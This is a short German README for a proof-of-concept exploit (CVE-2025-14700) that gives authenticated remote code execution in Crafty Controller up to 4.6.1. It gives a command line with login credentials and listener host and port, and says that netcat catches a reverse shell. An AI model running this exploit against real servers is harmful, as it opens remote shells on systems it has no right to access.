
Proof of Concept für authentifizierte RCE in Crafty Controller <= 4.6.1
Verwendung :
./CVE-2025-14700.py --url <crafty_controller_host> --login <username> --password <password> --lhost <listener_host> --lport <listener_port>
Dieses Skript verwendet netcat, um nach dem Auslösen der Reverse-Shell-Payload einen Listener einzurichten. Es funktioniert nicht, wenn du kein netcat auf deinem Listener-Rechner hast.